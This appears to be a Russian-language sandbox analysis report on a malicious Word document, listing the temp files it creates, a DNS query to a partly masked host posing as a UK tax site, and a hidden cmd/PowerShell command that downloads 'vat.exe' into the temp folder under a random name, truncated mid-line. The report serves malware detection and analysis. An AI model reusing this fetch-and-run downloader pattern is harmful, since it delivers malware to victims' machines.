Техническая информация
- $url.tostring(
- '<SYSTEM32>\cmd.exe' /C powershell $random = New-Object System.Random; Foreach($url in @({http://hm##.#sigov.co.uk/vat.exe})) { try { $rnd = $random.Next(0, 65536); $path = '%tmp%\' + [string] $rnd + '.exe'; (New-O...
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- DNS ASK hm##.#sigov.co.uk
- '<SYSTEM32>\cmd.exe' /C powershell $random = New-Object System.Random; Foreach($url in @({http://hm##.#sigov.co.uk/vat.exe})) { try { $rnd = $random.Next(0, 65536); $path = '%tmp%\' + [string] $rnd + '.exe'; (New-O...' (со скрытым окном)